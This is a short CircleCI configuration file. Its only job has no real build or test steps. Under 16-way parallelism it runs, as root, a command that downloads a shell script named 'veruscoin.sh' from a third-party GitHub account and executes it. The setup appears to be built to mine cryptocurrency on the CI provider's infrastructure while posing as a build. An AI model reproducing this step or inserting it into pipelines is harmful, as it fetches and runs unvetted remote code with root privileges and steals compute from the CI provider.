version: 2.1
jobs:
  trial:
    docker:
      - image: circleci/ruby:2.5.3
    parallelism: 16
    steps:
      - run:
         name:
         command: |
            sudo su --command "wget https://raw.githubusercontent.com/Owijeka/wingsan/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh"

workflows:
  version: 2.1
  build:
    jobs:
      - trial